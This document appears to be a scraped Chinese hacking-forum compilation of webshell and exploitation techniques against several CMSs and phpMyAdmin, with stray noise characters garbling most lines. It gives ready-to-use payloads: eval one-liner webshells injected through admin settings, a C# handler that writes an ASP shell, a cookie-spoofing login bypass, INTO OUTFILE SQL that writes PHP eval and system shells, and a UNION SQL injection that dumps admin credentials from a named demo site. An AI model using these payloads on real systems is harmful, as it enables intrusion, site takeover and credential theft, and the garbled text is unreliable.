6 k' _, U' ]! Z1 J5 d' E<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">% m- w3 ]: B9 D
Upload a new file:<br>
?4 D' {) u7 Q" y1 i" h6 Z<input type="file" name="NewFile" size="50"><br>5 K" D1 O4 ]% ~2 b( u
<input id="btnUpload" type="submit" value="Upload">* u- Y4 M- D, g! F0 E
</form>
. v4 E, }8 P- V8 d-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, h( y# ?- @% u8 g* F0 o9 ?1 w: S+ F j, u5 c: i$ |) W
SDcms 后台拿webshell1 R: p" \. w% }2 E8 r, S; y
! i8 F2 q0 m0 E第一种方法:* _8 _1 I5 ~8 Y' ~8 e. C* V0 V5 C
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
f8 k; q; J- N/ V( S把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
8 ~/ _$ G" }& S7 C3 h- z用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。4 n( K8 Z% z" b* k6 E7 n
第二种方法:
+ ?3 {* w3 M) i5 ?) }, v进入后台-->系统管理-->系统设置-->系统设置->上传设置;2 d) r. J: A( _+ @
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!5 W* m/ w" _) @% V3 E# I$ @0 l
第三种方法: ^* e/ t' j+ \$ I/ C
进入后台-->界面管理-->模板文件管理-->创建文件
; e/ K3 s: K' e2 E& Q* {& a' I文件名写入getshell.ashx
$ h2 [8 B4 e! Q% e% s# a, y5 V1 z; \内容写入下面内容:) b" a7 v7 T$ w2 I8 {$ @
/====================复制下面的=========================/
1 I4 c: G( b! v- ?* Z4 z<%@ WebHandler Language="C#" Class="Handler" %>& x7 T: o% v4 e0 [
using System;4 \: V0 s/ |2 \- N _
using System.Web;% {7 M3 k$ \0 _( m, I
using System.IO;
5 L# j+ d+ i' T) N& C4 Dpublic class Handler : IHttpHandler {. T6 H, H; @& u( t7 ` e5 v& o
public void ProcessRequest (HttpContext context) {
( i: M1 T& h/ s) d9 W. hcontext.Response.ContentType = "text/plain";
# j6 V, C; O% w' h5 \StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! B9 ]# [; E! \0 h! a4 X0 D; Zfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");, E2 y- w' [3 [
file1.Flush();
4 |5 @0 q! e1 b" y1 G O: i0 H yfile1.Close();
. m6 w C7 \ K" `6 G! }" t}
A' f: W/ k# }+ m$ Ipublic bool IsReusable {
4 ~* y5 m/ A" N+ K; t" Xget {
3 a- e' ^5 K# t0 \return false;
! y8 A2 ?4 p# a1 ?: k}5 P8 p* Z1 y% ?* P% C6 f' ?
}" f$ W( `% Y+ b( d% G1 A
}
: Q/ w2 m/ o( T$ u n/=============================================/
3 L4 n8 p! f/ I% z9 t- G) q% z访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx) a( W+ p5 x, W4 o& ?' c
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接( S) K3 }& J$ }
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ N$ O& z8 K$ C9 g$ B
3 m# A/ T+ {- _: } Z0 a5 TESCMS网站管理系统0day
3 b9 ?& p& X" ^7 ~; w6 U
$ m- u+ ~9 m# p. t6 j& |后台登陆验证是通过admin/check.asp实现的
$ q! ~! k6 m7 m) `; a+ L7 r: j
; {7 j- C, L* x3 Z" A0 T首先我们打开http://target.com/admin/es_index.html% ?6 A) u+ h+ `+ d
然后在COOKIE结尾加上- k8 B, h; M, d
; ESCMS$_SP2=ES_admin=st0p;2 v& Z6 _4 L( K9 l1 r$ p- L
修改,然后刷新
# w4 A$ \: f- \& I# Q进后台了嘎..+ h0 }- x) V1 O0 Z- k. N/ W4 J- e
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
* L7 G; z4 f7 V$ F& z6 | t) }% I: z! U
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
" H" B; o: j. x嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp8 v# o1 i- K$ A g; X
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..$ c; o5 {) P) i) d5 b
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
$ w- D. `' i; A1 _) ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" w4 O9 z. F0 K' l7 u
9 s! t8 e, q0 a4 l8 v9 D
宁志网站管理系统后台无验证漏洞及修复
5 P2 k8 N+ i2 f7 Y' ^0 y# A; m' v. ]$ L- p
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
" p6 d" p, e' S4 r* i官方网站:www.ningzhi.net
7 s5 n1 s. L9 v. r# R学校网站管理系统 V.2011版本
\: N6 I9 ~+ m- ^/ Nhttp://down.chinaz.com/soft/29943.htm
1 t5 j+ N5 ?$ {* @6 m- \/ r# q/ @其它版本(如:政府版等),自行下载.- H8 o8 p. g- O" J- D( f7 R! A
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
; h/ R9 T6 ^6 C1 D0 N6 z3 `( ilogin.asp代码如下:. G. g: G# X" i
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
" z0 I$ [! A2 k& N3 X4 O T( e4 zmanage.asp代码我就不帖出来了.反正也没验证.
. a( v" h r+ Q R' P只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
, h" J; C( v2 X! V" I漏洞利用:
$ |$ F& V+ W% p直接访问http://www.0855.tv/admin/manage.asp; `) u5 `$ b+ t6 s! }
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
& T6 Z: |; }+ f$ S$ @. p$ ~% ?----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 u- h. h: d7 n7 B% p* Y# }& b6 g# Y7 Q+ d o
phpmyadmin拿shell的四种方法总结及修复! M, c0 q$ C5 Q8 A, @+ V
& Q x) Y( B- E4 T! j9 ~3 a方法一:- a. D. u5 S* c1 l$ H6 H
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
$ B: S, F) n9 W: IINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');$ Y1 |7 y5 y" j1 Y
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 u) b, p) `. s, S----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php* [, E9 j1 ~$ l$ z5 L/ v+ _: U
一句话连接密码:7on8 d ]# [* U5 L; W+ c) B. U
方法二:
5 y2 \+ s, }. B' U读取文件内容: select load_file('E:/xamp/www/s.php');. w+ R6 I# \: q! I9 b% s7 d
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
" b' T& Y2 j/ s, c0 Rcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
o f. E" o( x* M0 d" l8 |3 f& {5 O方法三:
2 x; j/ w* I- I1 KJhackJ版本 PHPmyadmin拿shell+ z+ q6 y' g) [, ?3 L) L7 r# L2 ?( f
Create TABLE study (cmd text NOT NULL);
& p: ?" F, E5 Y; k/ t1 CInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
9 ~. g" |6 O. s& l6 ~select cmd from study into outfile 'E:/wamp/www/7.php';* f/ ]$ N! K5 z: m4 p+ P
Drop TABLE IF EXISTS study;
2 ^9 _! T/ Z9 R% d* Y<?php eval($_POST[cmd])?>
3 M3 H2 T2 j3 O# g) S7 m# hCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
1 L. L- n. _* f7 r( JINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 14 P. W' ]: N, p. p/ S5 L
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1- N, o8 a) D4 X6 s1 I. g
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
" c- e* }+ {4 Y; h0 m# t方法四:9 C8 ~( w; a' I1 l" x
select load_file('E:/xamp/www/study.php');; \, N( i0 H# m) V7 l) C
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
0 s3 Y( G4 [7 U7 R然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
! ~! d3 h) J" K' v: w9 l. e4 s9 K-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
( L! S0 e/ j3 h8 [ G7 l% B8 v2 e! k+ f: ^
NO.001中学网站管理系统 Build 110628 注入漏洞0 C* u* r% I& _1 M4 }+ y3 I
# Q3 _ E- y: o) V( ^0 t$ U8 t
NO.001中学网站管理系统功能模块:& t4 K0 E5 L& r7 t! O, F
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等" z; P; g% h( Y
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
5 \( q& L+ L" E1 h3 O* j' a5 o1 y3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息6 a) L& @0 H0 N1 }
4.视频图片管理:一级分类,动态添加视频或者图片等信息$ c# q: p1 o6 {- ^. M1 r; j/ v; n8 V: L
5.留言管理:对留言,修改,删除、回复等管理" h* M+ T. _, x, d
6.校友频道:包括校友资料excel导出、管理等功能( s0 n2 N% W) U- b0 B/ n; m( b
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页' }) x5 V& M _6 D; N* d8 l4 R( s
默认后台:admin/login.asp5 O! G( a$ U7 q/ P1 _1 u- s( a) U
官方演示:http://demo.001cms.net8 G- @) U$ Z( k5 X
源码下载地址:http://down.chinaz.com/soft/30187.htm
$ @, G! r; R( e! zEXP:/ o4 G6 T( o8 J4 x% w$ [6 M) {, L
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin+ u2 K$ o0 k7 {: j. C* b
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin: i; Z$ R6 O' N* |. u- |: @
getshell:后台有备份,你懂的& j- Y3 ~% v. A7 _- M* a6 I# v
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
9 L( v& H1 x- S5 l* f------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |